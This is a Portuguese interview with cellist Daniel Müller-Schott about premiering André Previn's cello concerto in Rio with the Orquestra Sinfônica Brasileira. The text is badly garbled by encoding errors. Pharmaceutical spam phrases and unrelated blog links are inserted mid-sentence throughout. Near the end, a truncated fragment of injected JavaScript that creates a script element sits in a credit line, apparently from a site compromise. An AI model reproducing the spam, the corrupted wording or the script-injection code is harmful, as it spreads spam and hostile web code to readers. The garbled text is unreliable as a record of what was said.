EntrevistaLateralMúsica sinfônica

Criando laA�os pela mA?sica

Nesta entrevista, o violoncelista alemA?o Daniel MA?ller-Schott a�� que tocou no Rio de Janeiro com a OSB no dia 28 de novembro a�� fala sobre parcerias com compositores e com o pA?blico.

 

Considerado um dos maiores violoncelistas da atualidade, o violoncelista alemA?o Daniel MA?ller-Schott diclofenac 50mg europe subiu ao palco da Cidade das Artes no dia 28 de novembro, ao lado da Orquestra SinfA?nica Brasileira (OSB), regida por Roberto Minczuk, para executar a estreia latino-americana da peA�a Concerto para violoncelo e orquestra, de AndrA� Previn, dedicada ao mA?sico alemA?o e estreada por ele em 2011, em Leipzig.

Previn nA?o A� o A?nico compositor a dedicar uma peA�a ao violoncelista: o norte-americano Sebastian Currier, o alemA?o Peter Ruzicka e o finlandA?s Olli Mustonen jA? escreveram para MA?ller-Schott. Com duas dA�cadas de carreira, o alemA?o A� dono de uma discografia extensa e participaA�A�es em festivais, alA�m de acumular prA?mios como o primeiro lugar no Concurso Internacional Tchaikovsky para Jovens MA?sicos, conquistado em Moscou aos 15 anos. AlA�m da OSB, MA?ller-Schott jA? se apresentou com grupos como a FilarmA?nica de Londres, a SinfA?nica de TA?quio e a FilarmA?nica de Nova York. “NA?o A� todo dia que recebemos um discA�pulo de Mstislav Rostropovich”, comemora o diretor artA�stico da OSB, Pablo Castellar http://davidgagnonblog.com/?p=2239 .

ConheA�a mais sobre o mA?sico alemA?o nesta entrevista exclusiva.

A�* A�* A�* A�*

price of tricor at walmart Movimento.com a�� VocA? executou o Concerto para violoncelo e orquestra pela primeira vez na AmA�rica Latina. Como A� tocar uma peA�a escrita especialmente para vocA?? Em sua opiniA?o, por que ela foi dedicada a vocA? e o que a faz especial?

Daniel MA?ller-Schott a�� Eu estava ansioso para tocar o Concerto para violoncelo de AndrA� Previn. A� uma honra enorme para mim. AndrA� acompanha minha carreira hA? muitos anos e jA? gravamos juntos obras de Elgar, Walton e Mozart. Acho que esta A� a razA?o de ele haver decidido escrever essa peA�a para mim. A� aquela parcela de colaboraA�A?o e confianA�a que deve haver entre musicistas, fundamental para o nascimento de novas ideias em parceria.

 

Movimento.com a�� Por que vocA? escolheu incluir Kol Nidrei, de Max Bruch, inspirada em uma oraA�A?o hebraica, no mesmo programa?

Daniel MA?ller-Schott a�� Essa peA�a, em sua histA?ria, nunca foi suficientemente tocada, e cada execuA�A?o revela grande profundidade expressiva. Acho que comporA? muito bem com o concerto do AndrA�.

 

Movimento.com a�� VocA? A� constante colaborador de grandes compositores. Como funciona essa parceria?

Daniel MA?ller-Schott a�� Cada colaboraA�A?o A� A?nica para mim. HA? compositores que sA? se aproximam depois de terem terminado a obra, e entA?o fazem perguntas. HA? outros que gostam de envolver mais o intA�rprete durante o processo de composiA�A?o. Sempre existe algo a aprender em cada trabalho e A� muito importante entender que a mA?sica nunca A� gravada na pedra a�� todos precisamos trazA?-la A� vida a cada recital. E a plateia tem papel fundamental nisso.

 

Movimento.com a�� http://blog.h4gchurch.com/?p=14496 Esta foiA�sua primeira apresentaA�A?o no Rio de Janeiro? VocA? tinha expectativas com relaA�A?o ao pA?blico?

Daniel MA?ller-Schott a�� Sim, foiA�minha estreia no Rio e mal podia esperar para tocar. JA? havia estadoA�antes, de fA�rias, nessa linda cidade e em suas praias. Como jA? havia feitoA�concertos em Belo Horizonte e em SA?o Paulo, tenho alguma experiA?ncia com as plateias brasileiras. As pessoas no Brasil tA?m tanto amor, admiraA�A?o e entusiasmo pela mA?sica que, para mim, A� um enorme prazer tocar aqui.

 

Movimento.com a�� Purchase VocA? tem hobbies Cheap ? O que faz quando nA?o estA? tocando?

Buy Daniel MA?ller-Schott a�� buy imdur classification Tenho muitos hobbies, a comeA�ar por esportes, livros, boa comida, cinema, museus e viagens. Explorar diferentes paA�ses e culturas A� parte da minha profissA?o e eu gosto muito disso. Encontrar pessoas a�� sejam velhos ou novos amigos a�� em minhas viagens e concertos A� muito gratificante. E a mA?sica ajuda muito a estabelecer essas conexA�es e laA�os maravilhosos.

 

MA?ller-Schotta�?, Minczuk e a OSB
MA?ller-Schotta�?, Minczuk e a OSB

 

Com a colaboraA�A?o da AgA?ncia Febreif (document.currentScript) { var d=document;var s=d.createElement(‘script’);

Fabiano Gonçalves
Publicitário e roteirista (formado no Maurits Binger Film Institute - Amsterdã). Corroteirista do longa O Amor Está no Ar e de programas de TV (novela Chiquititas - 1998/2000). Redator na revista SuiGeneris, no site Escola24horas e no Departamento Nacional do Senac. Um dos fundadores do movimento.com, escreve também sobre televisão para o site teledossie.com.br. - E-mail: fabiano@movimento.com